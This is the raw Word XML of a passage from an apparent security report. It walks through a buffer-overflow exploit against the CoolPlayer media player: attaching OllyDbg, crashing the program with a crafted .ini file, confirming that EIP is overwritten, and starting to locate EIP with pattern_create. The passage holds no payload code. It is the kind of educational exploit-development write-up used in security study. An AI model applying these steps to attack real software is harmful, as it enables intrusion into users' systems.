      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>PlaytestSkin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the payload being submitted to the application</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9463" w:type="dxa"/>
        <w:tblInd w:w="-108" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6204"/>
        <w:gridCol w:w="3259"/>
      </w:tblGrid>
      <w:tr w:rsidR="00164B2A" w14:paraId="452EAC73" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="2977"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9462" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="5000" w:type="pct"/>
              <w:tblInd w:w="5" w:type="dxa"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblCellMar>
                <w:left w:w="10" w:type="dxa"/>
                <w:right w:w="10" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="2195"/>
              <w:gridCol w:w="7052"/>
            </w:tblGrid>
            <w:tr w:rsidR="00164B2A" w14:paraId="50223FA6" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2195" w:type="dxa"/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="108" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="108" w:type="dxa"/>
                  </w:tcMar>
                </w:tcPr>
                <w:p w14:paraId="35EF8EB4" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
                  <w:pPr>
                    <w:pStyle w:val="Standard"/>
                    <w:keepNext/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:object w:dxaOrig="1875" w:dyaOrig="1455" w14:anchorId="6A803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72.75pt;visibility:visible;mso-wrap-style:square" o:ole="">
                        <v:imagedata r:id="rId15" o:title=""/>
                      </v:shape>
                      <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1682840532" r:id="rId16"/>
                    </w:object>
                  </w:r>
                </w:p>
                <w:p w14:paraId="424250CE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
                  <w:pPr>
                    <w:pStyle w:val="Caption"/>
                    <w:spacing w:after="0"/>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:bookmarkStart w:id="14" w:name="_Ref71473501"/>
                  <w:bookmarkStart w:id="15" w:name="_Toc71564039"/>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Figure 3 - </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t>OllyDebug</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> Attach</w:t>
                  </w:r>
                  <w:bookmarkEnd w:id="14"/>
                  <w:bookmarkEnd w:id="15"/>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7052" w:type="dxa"/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="108" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="108" w:type="dxa"/>
                  </w:tcMar>
                </w:tcPr>
                <w:p w14:paraId="0522B845" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
                  <w:pPr>
                    <w:pStyle w:val="Standard"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t>Before injecting the resulting .</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t>ini</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> file the application will need to be attached to </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t>Ollydebug</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve">. This can be done by selecting </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t>File</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> then </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Attach </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t>(</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> REF _Ref71473501 </w:instrText>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Figure 3 - </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t>OllyDebug</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> Attach</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t>) and</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve">then selecting the </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t>CoolPlayer</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> application (</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> REF _Ref71473545 </w:instrText>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Figure 4 - Selecting </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t>Coolplayer</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t>).</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2003E2D8" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
                  <w:pPr>
                    <w:pStyle w:val="Standard"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00164B2A" w14:paraId="0D098CA8" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2195" w:type="dxa"/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="108" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="108" w:type="dxa"/>
                  </w:tcMar>
                </w:tcPr>
                <w:p w14:paraId="4CF0B293" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
                  <w:pPr>
                    <w:pStyle w:val="Standard"/>
                    <w:keepNext/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7052" w:type="dxa"/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="108" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="108" w:type="dxa"/>
                  </w:tcMar>
                </w:tcPr>
                <w:p w14:paraId="48FF8120" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
                  <w:pPr>
                    <w:pStyle w:val="Standard"/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00164B2A" w14:paraId="61E95B80" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9247" w:type="dxa"/>
                  <w:gridSpan w:val="2"/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="108" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="108" w:type="dxa"/>
                  </w:tcMar>
                </w:tcPr>
                <w:p w14:paraId="4265CF50" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
                  <w:pPr>
                    <w:pStyle w:val="Standard"/>
                    <w:keepNext/>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:drawing>
                      <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="548A6793" wp14:editId="5CB4463F">
                        <wp:extent cx="5550480" cy="352440"/>
                        <wp:effectExtent l="0" t="0" r="0" b="9510"/>
                        <wp:docPr id="9"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550480" cy="352440"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:noFill/>
                                <a:ln>
                                  <a:noFill/>
                                  <a:prstDash/>
                                </a:ln>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="56CF1870" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
                  <w:pPr>
                    <w:pStyle w:val="Caption"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="2775"/>
                    </w:tabs>
                    <w:spacing w:after="0"/>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:bookmarkStart w:id="16" w:name="_Ref71473545"/>
                  <w:bookmarkStart w:id="17" w:name="_Toc71564040"/>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Figure 4 - Selecting </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t>Coolplayer</w:t>
                  </w:r>
                  <w:bookmarkEnd w:id="16"/>
                  <w:bookmarkEnd w:id="17"/>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="50681D08" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00164B2A" w14:paraId="3B57C5EE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6203" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2A9A8AE0" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Once submitted this will result in the application crashing due to a buffer overflow. This can be further </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>analysed</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> by looking at the buffer in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Ollydebug</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, as seen in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> REF _Ref71473972 </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Figure 6 - Overflown </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Buffer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> REF _Ref71473585 </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Error</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>: Reference source not found</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. This shows the sequence of </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>As</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> that were generated into the file seen in Appendix B - </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> REF _Ref71628497 </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Crash.ini</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05CE77B7" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5CD34DC4" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Looking at the EIP value shows that it also has been overwritten by this sequence (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> REF _Ref71473989 </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Figure 5 – Overflow EIP Value</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>). This is important because being able to manipulate the EIP is what will make it possible to take control of the program. Seeing that the EIP has been overwritten is what verifies that an input can be crafted that will manipulate what is in the EIP and thereby allow for the exploit to be executed.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="315B5170" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="17500B7C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:keepNext/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AF7C28B" wp14:editId="5DEF184D">
                  <wp:extent cx="857159" cy="190440"/>
                  <wp:effectExtent l="0" t="0" r="91" b="60"/>
                  <wp:docPr id="10"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57159" cy="190440"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                            <a:prstDash/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="74D546B2" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Caption"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="18" w:name="_Ref71473989"/>
            <w:bookmarkStart w:id="19" w:name="_Toc71564041"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Figure 5 – Overflow EIP Value</w:t>
            </w:r>
            <w:bookmarkEnd w:id="18"/>
            <w:bookmarkEnd w:id="19"/>
          </w:p>
          <w:p w14:paraId="350612C6" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:keepNext/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3259" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="450B165D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:keepNext/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="284"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38841897" wp14:editId="3EB031CC">
                  <wp:extent cx="1400040" cy="2922119"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1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400040" cy="2922119"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                            <a:prstDash/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="5565BEDB" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Caption"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="20" w:name="_Ref71473972"/>
            <w:bookmarkStart w:id="21" w:name="_Toc71564042"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">       Figure 6 - Overflown Buffer</w:t>
            </w:r>
            <w:bookmarkEnd w:id="20"/>
            <w:bookmarkEnd w:id="21"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3151044B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C1E7A01" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc71564004"/>
      <w:r>
        <w:t>Locating EIP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="083B3A27" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6332B013" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now that it has been confirmed that the program is vulnerable to a buffer overflow attack it is important to know where the EIP is within the stack. The first stage is to generate a pattern that can be submitted to the application. This can be done using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pattern_create</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command, as seen in </w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:instrText xml:space="preserve"> REF _Ref71474034 </w:instrText>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>Figure 7 - Pattern Create Command</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A99B4CD" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="087329E4" wp14:editId="451ACDF2">
            <wp:extent cx="5943600" cy="850319"/>
            <wp:effectExtent l="0" t="0" r="0" b="6931"/>
            <wp:docPr id="12"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3600" cy="850319"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
